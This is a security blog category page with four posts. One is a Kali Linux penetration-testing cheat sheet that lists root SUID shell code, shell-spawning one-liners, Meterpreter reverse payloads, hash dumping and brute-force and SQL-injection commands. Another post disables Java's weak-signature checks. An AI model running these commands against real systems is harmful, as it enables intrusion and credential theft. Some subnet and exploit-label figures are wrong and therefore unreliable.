Category:

Browser

Mozilla Firefox, Google Chrome etc. Posts related to Browsers such as Google Chrome, Firefox, IceWeasel in different Linux will be listed under this category.

Fix Java error Unsigned application requesting unrestricted access to system

by blackMORE June 8, 2017

written by blackMORE

Tried to login to one of my server that requires Java and immediately got this error:

Unsigned application requesting unrestricted access to system. The following resource is signed with a weak signature algorithm MD5withRSA and is treated as unsigned

After some research on Google I found that the root cause was JAR files signed with MD5 algorithms. Apparently Java/Oracle decided to play smart suddenly and now they are treating JAR files signed with keySize less than <1024 as unsigned JARs. Read more here.

Fixing Unsigned application requesting

You can fix this by simply commening out jdk.jar.disabledAlgorithms in the file of lib/security/java.security

In my Windows it’s located at:
C:\Program Files (x86)\Java\jre7\lib\security\java.security
In MacOS it’s located at
/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/lib/security/java.security
In Linux? – readers please comment below

I simply edited the file and added a hash # in front of the line below, save and run the JNLP File again and it worked.

# jdk.jar.disabledAlgorithms=MD2, MD5, RSA keySize < 1024

In some cases you may need to clear browser cache and Java Temporary files. Browser cache is normal, just delete everything including history form the beginning of time, all cookies, downloaded applications etc. For Java Temporary files do it from Control Panel > Java >

Now you can argue if this is secured? Duh, no … but when you’re about to make a change and there’s no alternative, then this is a quick and dirty fix. An alternative might be changing it to <128 Keysize or something else instead of commenting it out. Use your judgement i.e.

jdk.jar.disabledAlgorithms=MD2, MD5, RSA keySize < 128

June 8, 2017 52 comments

Browser How to Linux News Security USB

Encrypted EMail Service ProtonMail Opens Door for TOR Users

by blackMORE February 14, 2017

written by blackMORE

Let’s admit it: Privacy and Security are the two elements that matter most on our cyber cruising. Anyone including the government that sleuths on our online activities and data is not so welcome. The good news is that now even your email communication can happen in disguise through Tor network using ProtonMail as your Encrypted EMail Service provider. They recently secured a place on Deep Web using the .onion web domain protonirockerxow.onion.

You are probably wondering, what is ProtonMail? It is a free Encrypted EMail Service provider sworn to protect communication and data exchange over the internet through an end to end encryption mailing algorithm. The company is enthusiastic about assisting users to not only communicate securely but also to defend them against state-restricted censorship in accessing content privately.

ProtonMail CEO Andy Yen in a statement mentioned his team’s key impetus behind employing the Tor infrastructure in their mailing system. He said that internet restrictions in some countries are inevitable, therefore making email services accessible via a secure network capable of circumvention will open a gateway for users surrounded by snoopers.

Just how secure is this move?

Tor network has over the years undergone review as one of the most secure platforms through which privacy conscious individuals and corporations can browse the internet securely and anonymously.

What is the guarantee that users will not suffer a breach of the security of their data? First, neither can the hidden-service server have its real IP discovered nor the users’ IP addresses. Tor uses a multi-layered encryption protocol and additionally rotates IP addresses frequently. Hence, neither ProtonMail nor internet interceptors can capture and log the real identity or location of users. It makes tracking difficult.

Secondly, a Distributed Denial-Of-Service attack is unlikely. Users will thus enjoy unlimited access to ProtonMail email services. In 2015, ProtonMail suffered a massive DDoS attack that left their services paralyzed for days. The attack seems to be the wake-up call for the team.

Thirdly, if the email provider official website becomes censored, access to its services will still be possible via the Tor network. Recently, states have been aggressive in surveillance of online activity, a move that has significantly cut access to most privacy tools. It is, therefore, a calculated defense before an impending offense from such governments.

How to Use ProtonMail on Tor

Requirements.

Tor Browser
ProtonMail Account
ProtonMail Deep Web Link

Steps

Download Tor Browser from https://www.torproject.org/download/download.html. Choose your Operating system. The site contains explicit guidelines regarding installation and initial setup. You can follow instructions from here to setup TOR in Linux.
Launch Tor browser, set up Proxy info and Bridges(optional) and wait as an encrypted path to the internet gets established. You can test whether your traffic is conveyed via Tor network by visiting https://check.torproject.org.
Visit ProtonMail Tor server at https://protonirockerxow.onion, read their terms and conditions and create an account with them. Any data sent from your account henceforth will be channeled through Tor Network concealing both your location and identity.

Alternatives to ProtonMail

1. Tutanota

Launched in 2011, Tutanota is a Germany-based encrypted webmail service that offers both free and premium mailing options. Like ProtonMail, it also employs an end-to-end encryption using 2048 bit RSA and 128 bit AES as its encryption methods. Emails are only readable by the recipient and sender. If a recipient uses an unencrypted email provider, Tutanota sends them a link to a temporary account where they can view the encrypted message. The only shortcoming is that they collect logs every 14 days but for technical reasons.

2. Countermail

This email provider uses OpenPGP’s encryption protocol to secure email communications. Unlike ProtonMail, it has a secure USB key option which requires plugging a USB drive containing the unique key before accessing your account. It supports almost all computer operating systems with also IMAP for a personalized email client. The only problem is that it only offers a one week trial.

3. Kolab Now

The company operates from Switzerland and uses an open-source email service. They are committed to privacy, and therefore they do not allow ads on your account which might compromise your identity. The only challenge is that they do not offer free encrypted email services but their prices are reasonable.

4. Mailfence

Mailfence have been in the mailing industry since 1999. It operates from Belgium. They offer a broad range of other services including contacts synchronizing and document storage. They also use an end-to-end encryption protocol for email exchange. However, they are not open source a factor that might not guarantee privacy with certainty.

What I liked about ProtonMail

ProtonMail is developed by some of the brightest mind in business. These are scientists, not just some random hacker or programmers developing a new service. Their tag like is:

We are scientists, engineers, and developers drawn together by a shared vision of protecting civil liberties online. This is why we created ProtonMail, an easy to use secure email service with built-in end-to-end encryption and state of the art security features. Our goal is to build an internet that respects privacy and is secure against cyberattacks.

Most of the guys have a PhD and been working in CERN. In case you didn’t know, CERN developed modern Internet as we see today. So, I guess I am confident in saying they know what they are doing. Might give this Encrypted EMail Service a try or least register your email address.

February 14, 2017 8 comments

BIOS Browser Cheat Sheet Cracking Database How to Kali Linux Linux Metasploit Monitoring Networking Password Python Security Security Tools Shell Script Windows Wireshark

Kali Linux Cheat Sheet for Penetration Testers

by blackMORE December 20, 2016

written by blackMORE

Penetration testing (also called pen testing) is the practice of testing a computer system, network or Web application to find vulnerabilities that an attacker could exploit.

Kali Linux Cheat Sheet for Penetration testers is a high level overview for typical penetration testing environment ranging from nmap, sqlmap, ipv4, enumeration, fingerprinting etc. Always view man pages if you are in doubt or the commands are not working as outlined here (can be OS based, version based changes etc.) for the operating system you are using (such as BlackBox, Black Ubuntu, ParrotSec OS, Debian, Ubuntu etc.). I’ve also referenced some guides that I found useful in different sections and it might come in handy.

Recon and Enumeration

NMAP Commands

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

Command	Description
nmap -v -sS -A -T4 target	Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p–A -T4 target	As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target	As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 –script=smb-check-vulns –script-args=unsafe=1 192.168.1.X	Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
ls /usr/share/nmap/scripts/* \| grep ftp	Search nmap scripts for keywords

Router hack using nmap here.

SMB enumeration

In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS, /ˈsɪfs/), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network

Command	Description
nbtscan 192.168.1.0/24	Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip	Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Other Host Discovery

Other methods of host discovery, that don’t use nmap…

Command	Description
netdiscover -r 192.168.1.0/24	Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site

SMB Enumeration

Enumerate Windows shares / Samba shares.

Command	Description
nbtscan 192.168.1.0/24	Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip	Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.

Command	Description
python -m SimpleHTTPServer 80	Run a basic http server, great for serving up shells etc

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

Command	Description
mount 192.168.1.1:/vol/share /mnt/nfs	Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs	Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no	Mount a Windows share on Windows from the command line
apt-get install smb4k -y	Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic FingerPrinting

A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.

Command	Description
nc -v 192.168.1.1 25 telnet 192.168.1.1 25	Basic versioning / fingerprinting via displayed banner

Command

Description

nc -v 192.168.1.1 25

telnet 192.168.1.1 25

Basic versioning / fingerprinting via displayed banner

SNMP Enumeration

SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.

Command	Description
snmpcheck -t 192.168.1.X -c public snmpwalk -c public -v1 192.168.1.X 1\| grep hrSWRunName\|cut -d* * -f snmpenum -t 192.168.1.X onesixtyone -c names -i hosts	SNMP enumeration

Command

Description

snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMP enumeration

DNS Zone Transfers

Command	Description
nslookup -> set type=any -> ls -d blah.com	Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com	Linux DNS zone transfer

DNSRecon

DNSRecon provides the ability to perform:

Check all NS Records for Zone Transfers
Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
Check for Wildcard Resolution
Brute Force subdomain and host A and AAAA records given a domain and a wordlist
Perform a PTR Record lookup for a given IP Range or CIDR
Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check
Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google

 DNS Enumeration Kali - DNSReconroot:~#
 dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

Command	Description
nikto -h 192.168.1.1	Perform a nikto scan against target
dirbuster	Configure via GUI, CLI input doesn’t work most of the time

Packet Inspection

Command	Description
tcpdump tcp port 80 -w output.pcap -i eth0	tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

Command	Description
python /usr/share/doc/python-impacket-doc/examples /samrdump.py 192.168.XXX.XXX	Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt	RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

Command	Description
snmpwalk public -v1 192.168.X.XXX 1 \|grep 77.1.2.25 \|cut -d” “ -f4	Enmerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/ samrdump.py SNMP 192.168.X.XXX	Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep)	Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

Command	Description
/usr/share/wordlists	Kali word lists

Massive wordlist here at g0tm1lk’s blog

Brute Forcing Services

Hydra FTP Brute Force

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.

Command	Description
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V	Hydra FTP brute force

Hydra POP3 Brute Force

Command	Description
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V	Hydra POP3 brute force

Hydra SMTP Brute Force

Command	Description
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V	Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15

Cracking password using Hydra guide here

Password Cracking

John The Ripper – JTR

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.

Command	Description
john –wordlist=/usr/share/wordlists/rockyou.txt hashes	JTR password cracking
john –format=descrypt –wordlist /usr/share/wordlists/rockyou.txt hash.txt	JTR forced descrypt cracking with wordlist
john –format=descrypt hash –show	JTR forced descrypt brute force cracking

Cracking password using John the Ripper guide here

Exploit Research

Ways to find exploits for enumerated hosts / services.

Command	Description
searchsploit windows 2003 \| grep -i local	Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3	Use google to search exploit-db.com for exploits
grep -R “W7” /usr/share/metasploit-framework /modules/exploit/windows/*	Search metasploit modules using grep – msf search sucks a bit

Full on guide with screenshots for searching exploits here

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

Command	Description
process.h, string.h, winbase.h, windows.h, winsock2.h	Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h	Linux exploit code

Build Exploit GCC

Compile exploit gcc.

Command	Description
gcc -o exploit exploit.c	Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

Command	Description
gcc -m32 exploit.c -o exploit	Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

Command	Description
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe	Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}

Building the SUID Shell binary

gcc -o suid suid.c

For 32 bit:

gcc -m32 -o suid suid.c

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'

echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit

Metasploit was created by H. D. Moore in 2003 as a portable network tool using Perl. By 2007, the Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.

Like comparable commercial products such as Immunity’s Canvas or Core Security Technologies’ Core Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Since the acquisition of the Metasploit Framework, Rapid7 has added two open core proprietary editions called Metasploit Express and Metasploit Pro.

Metasploit’s emerging position as the de facto exploit development framework led to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk and remediation of that particular bug. Metasploit 3.0 began to include fuzzing tools, used to discover software vulnerabilities, rather than just exploits for known bugs. This avenue can be seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November 2006. Metasploit 4.0 was released in August 2011.

Meterpreter Payloads

Windows reverse meterpreter payload

Command	Description
set payload windows/meterpreter/reverse_tcp	Windows reverse tcp payload

Windows VNC Meterpreter payload

Command	Description
set payload windows/vncinject/reverse_tcp set ViewOnly false	Meterpreter Windows VNC Payload

Command

Description

set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

Command	Description
set payload linux/meterpreter/reverse_tcp	Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

Command	Description
upload file c:\\windows	Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp	Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp	Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe	Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c	Creates new channel with cmd shell
ps	Meterpreter show processes
shell	Meterpreter get shell on the target
getsystem	Meterpreter attempts priviledge escalation the target
hashdump	Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target	Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target	Meterpreter delete port forward

Common Metasploit Modules

Remote Windows Metasploit Modules (exploits)

Command	Description
use exploit/windows/smb/ms08_067_netapi	MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi	MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ ms09_050_smb2_negotiate_func_index	MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

Command	Description
use exploit/windows/local/bypassuac	Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

Command	Description
use auxiliary/scanner/http/dir_scanner	Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan	Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login	Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version	Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login	Metasploit Oracle Login Module

Metasploit Powershell Modules

Command	Description
use exploit/multi/script/web_delivery	Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell	Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer	Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload	Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Command	Description
run post/windows/gather/win_privs	Metasploit show privileges of current user
use post/windows/gather/credentials/gpp	Metasploit grab GPP saved passwords
load mimikatz -> wdigest	Metasplit load Mimikatz
run post/windows/gather/local_admin_search_enum	Idenitfy other machines that the supplied domain user has administrative access to

Networking

TTL Fingerprinting

Operating System	TTL Size
Windows	128
Linux	64
Solaris	255
Cisco / Network	255

IPv4

Classful IP Ranges

E.g Class A,B,C (depreciated)

Class	IP Address Range
Class A IP Address Range	0.0.0.0 – 127.255.255.255
Class B IP Address Range	128.0.0.0 – 191.255.255.255
Class C IP Address Range	192.0.0.0 – 223.255.255.255
Class D IP Address Range	224.0.0.0 – 239.255.255.255
Class E IP Address Range	240.0.0.0 – 255.255.255.255

IPv4 Private Address Ranges

Class	Range
Class A Private Address Range	10.0.0.0 – 10.255.255.255
Class B Private Address Range	172.16.0.0 – 172.31.255.255
Class C Private Address Range	192.168.0.0 – 192.168.255.255
	127.0.0.0 – 127.255.255.255

IPv4 Subnet Cheat Sheet

CIDR	Decimal Mask	Number of Hosts
/31	255.255.255.254	1 Host
/30	255.255.255.252	2 Hosts
/29	255.255.255.249	6 Hosts
/28	255.255.255.240	14 Hosts
/27	255.255.255.224	30 Hosts
/26	255.255.255.192	62 Hosts
/25	255.255.255.128	126 Hosts
/24	255.255.255.0	254 Hosts
/23	255.255.254.0	512 Host
/22	255.255.252.0	1022 Hosts
/21	255.255.248.0	2046 Hosts
/20	255.255.240.0	4094 Hosts
/19	255.255.224.0	8190 Hosts
/18	255.255.192.0	16382 Hosts
/17	255.255.128.0	32766 Hosts
/16	255.255.0.0	65534 Hosts
/15	255.254.0.0	131070 Hosts
/14	255.252.0.0	262142 Hosts
/13	255.248.0.0	524286 Hosts
/12	255.240.0.0	1048674 Hosts
/11	255.224.0.0	2097150 Hosts
/10	255.192.0.0	4194302 Hosts
/9	255.128.0.0	8388606 Hosts
/8	255.0.0.0	16777214 Hosts

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII	Character
x00	Null Byte
x08	BS
x09	TAB
x0a	LF
x0d	CR
x1b	ESC
x20	SPC
x21	!
x22	“
x23	#
x24	$
x25	%
x26	&
x27	`
x28	(
x29	)
x2a	*
x2b	+
x2c	,
x2d	–
x2e	.
x2f	/
x30	0
x31	1
x32	2
x33	3
x34	4
x35	5
x36	6
x37	7
x38	8
x39	9
x3a	:
x3b	;
x3c	<
x3d	=
x3e	>
x3f	?
x40	@
x41	A
x42	B
x43	C
x44	D
x45	E
x46	F
x47	G
x48	H
x49	I
x4a	J
x4b	K
x4c	L
x4d	M
x4e	N
x4f	O
x50	P
x51	Q
x52	R
x53	S
x54	T
x55	U
x56	V
x57	W
x58	X
x59	Y
x5a	Z
x5b	[
x5c	\
x5d	]
x5e	^
x5f	_
x60	`
x61	a
x62	b
x63	c
x64	d
x65	e
x66	f
x67	g
x68	h
x69	i
x6a	j
x6b	k
x6c	l
x6d	m
x6e	n
x6f	o
x70	p
x71	q
x72	r
x73	s
x74	t
x75	u
x76	v
x77	w
x78	x
x79	y
x7a	z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

Command	Description
enable	Enters enable mode
conf t	Short for, configure terminal
(config)# interface fa0/0	Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255	Add ip to fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255	Add ip to fa0/0
(config-if)# line vty 0 4	Configure vty line
(config-line)# login	Cisco set telnet password
(config-line)# password YOUR-PASSWORD	Set telnet password
# show running-config	Show running config loaded in memory
# show startup-config	Show sartup config
# show version	show cisco IOS version
# show session	display open sessions
# show ip interface	Show network interfaces
# show interface e0	Show detailed interface info
# show ip route	Show routes
# show access-lists	Show access lists
# dir file systems	Show available files
# dir all-filesystems	File information
# dir /all	SHow deleted files
# terminal length 0	No limit on terminal output
# copy running-config tftp	Copys running config to tftp server
# copy running-config startup-config	Copy startup-config to running-config

Cryptography

Hash Lengths

Hash	Size
MD5 Hash Length	16 Bytes
SHA-1 Hash Length	20 Bytes
SHA-256 Hash Length	32 Bytes
SHA-512 Hash Length	64 Bytes

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

Hash	Example
MD5 Hash Example	8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT Example	01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS	f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash Example	b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT	2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS	cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256	127e6fbfe24a750e72930c220a8e138275656b 8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALT	c73d08de890479518ed60cf670d17faa26a4a7 1f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASS	eb368a2dfd38b405f014118c7d9747fcc97f4 f0ee75c05963cd9da6ee65ef498:560407001617
SHA-512	82a9dda829eb7f8ffe9fbe49e45d47d2dad9 664fbb7adf72492e3c81ebd3e29134d9bc 12212bf83c6840f10e8246b9db54a4 859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALT	e5c3ede3e49fb86592fb03f471c35ba13e8 d89b8ab65142c9a8fdafb635fa2223c24e5 558fd9313e8995019dcbec1fb58414 6b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS	976b451818634a1e2acba682da3fd6ef a72adf8a7a08d7939550c244b237c72c7d4236754 4e826c0c83fe5c02f97c0373b6b1 386cc794bf0d21d2df01bb9c08a
NTLM Hash Example	b4b9b02e6f09a9bd760f388b67351e2b

Identify HASH and cracking password using Wireshark guide here

SQLMap Examples

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Command	Description
sqlmap -u http://meh.com –forms –batch –crawl=10 –cookie=jsessionid=54321 –level=5 –risk=3	Automated sqlmap scan
sqlmap -u TARGET -p PARAM –data=POSTDATA –cookie=COOKIE –level=3 –current-user –current-db –passwords –file-read=”/var/www/blah.php”	Targeted sqlmap scan
sqlmap -u “http://meh.com/meh.php?id=1” –dbms=mysql –tech=U –random-agent –dump	Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u “http://meh.com/form/” –forms	sqlmap check form for injection
sqlmap -o -u “http://meh/vuln-form” –forms -D database-name -T users –dump	sqlmap dump and crack hashes for table users on database-name.

Source:

This article originally appeared on Penetration Testing Tools Cheat Sheet.

December 20, 2016 2 comments

How to add RBL check on Zimbra Server - blackMORE Ops - 2

Browser How to Linux Administration Others Security Spam

How to add RBL on Zimbra Server?

by blackMORE December 19, 2016

written by blackMORE

A DNS-based Blackhole List (DNSBL) or Real-time Blackhole List (RBL) is an effort to stop email spamming. It is a “blacklist” of locations on the Internet reputed to send email spam. The locations consist of IP addresses which are most often used to publish the addresses of computers or networks linked to spamming; most mail server software can be configured to reject or flag messages which have been sent from a site listed on one or more such lists. The term “Blackhole List” is sometimes interchanged with the term “blacklist” and “blocklist”.

A DNSBL is a software mechanism, rather than a specific list or policy. There are dozens of DNSBLs in existence, which use a wide array of criteria for listing and delisting of addresses. These may include listing the addresses of zombie computers or other machines being used to send spam, ISPs who willingly host spammers, or those which have sent spam to a honeypot system.

Since the creation of the first DNSBL in 1997, the operation and policies of these lists have been frequently controversial, both in Internet advocacy and occasionally in lawsuits. Many email systems operators and users[4] consider DNSBLs a valuable tool to share information about sources of spam, but others including some prominent Internet activists have objected to them as a form of censorship. In addition, a small number of DNSBL operators have been the target of lawsuits filed by spammers seeking to have the lists shut down.[Wiki]

What is Zimbra?

In case you haven’t used or heard of Zimbra,

Zimbra is an enterprise-class email, calendar and collaboration solution built for the cloud, both public and private. With a redesigned browser-based interface, Zimbra offers the most innovative messaging experience available today, connecting end users to the information and activity in their personal clouds.

It provides:

Messaging and Collaboration
Advanced, Integrated Web Experience
Simplified Administration
Anywhere, Any Device

Zimbra’s Open Source Community

Since the inception, Zimbra has been a community. All of Zimbra Collaboration Open Source Edition software, documentation and innovation has been created, tested, used, and discussed openly by people like you participating in our Open Source Community. It’s contributors diagnose bugs, fix bugs, translate programs, submit patches, point out deficiencies in documentation, answer community questions, submit killer applications, alert Zimbra to something that needs tweaking, and write new software. No matter how you contribute, Zimbra welcomes new ideas and contributions for the advancement of greater shared knowledge and a better Zimbra Collaboration product.

See more here:

Add RBL check on Zimbra

# su - zimbra

Check current settings

$ zmprov gacf | grep zimbraMtaRestriction

Output:

zimbraMtaRestriction: reject_non_fqdn_sender
zimbraMtaRestriction: reject_non_fqdn_sender

Currently reject_non_fqdn_sender and reject_non_fqdn_sender is set.

Add a test RBL server

Adding cbl.abuseat.org

$ zmprov mcf \
zimbraMtaRestriction reject_invalid_helo_hostname \
zimbraMtaRestriction reject_non_fqdn_sender \
zimbraMtaRestriction "reject_rbl_client cbl.abuseat.org"

I used \ to break the lines. You can do it all in one line if you feel like.

$ zmprov mcf zimbraMtaRestriction reject_invalid_helo_hostname zimbraMtaRestriction reject_non_fqdn_sender zimbraMtaRestriction "reject_rbl_client cbl.abuseat.org"

Test Output:

$ zmprov gacf | grep zimbraMtaRestriction
zimbraMtaRestriction: reject_non_fqdn_sender
zimbraMtaRestriction: reject_invalid_helo_hostname
zimbraMtaRestriction: reject_rbl_client cbl.abuseat.org

Adding multiple RBL servers in Zimbra

Going full on retard with RBL check

$ zmprov mcf \
zimbraMtaRestriction reject_invalid_helo_hostname \
zimbraMtaRestriction reject_non_fqdn_sender \
zimbraMtaRestriction reject_invalid_hostname  \
zimbraMtaRestriction "reject_rbl_client sbl.spamhaus.org" \
zimbraMtaRestriction "reject_rbl_client bl.spamcop.net" \
zimbraMtaRestriction "reject_rbl_client dnsbl.sorbs.net" \
zimbraMtaRestriction "reject_rbl_client cbl.abuseat.org" \
zimbraMtaRestriction "reject_rbl_client dnsbl.njabl.org"

New Output:

$ zmprov gacf | grep zimbraMtaRestriction
zimbraMtaRestriction: reject_invalid_helo_hostname
zimbraMtaRestriction: reject_non_fqdn_sender
zimbraMtaRestriction: reject_invalid_hostname
zimbraMtaRestriction: reject_rbl_client sbl.spamhaus.org
zimbraMtaRestriction: reject_rbl_client bl.spamcop.net
zimbraMtaRestriction: reject_rbl_client dnsbl.sorbs.net
zimbraMtaRestriction: reject_rbl_client cbl.abuseat.org
zimbraMtaRestriction: reject_rbl_client dnsbl.njabl.org

List of RBL servers:

Don’t go full retard with RBL in Zimbra; quite often some RBL servers blacklist good domains for absolutely no reasons (unexplained); so test; test; test until you have the best combination. Here’s a list of all the RBLs/DNSBls you can check your mail servers against(mostly free):

b.barracudacentral.org
bl.emailbasura.org
bl.spamcannibal.org
bl.spamcop.net
blackholes.five-ten-sg.com
blacklist.woody.ch
bogons.cymru.com
cbl.abuseat.org
cdl.anti-spam.org.cn
combined.abuse.ch
combined.rbl.msrbl.net
db.wpbl.info
dnsbl-1.uceprotect.net
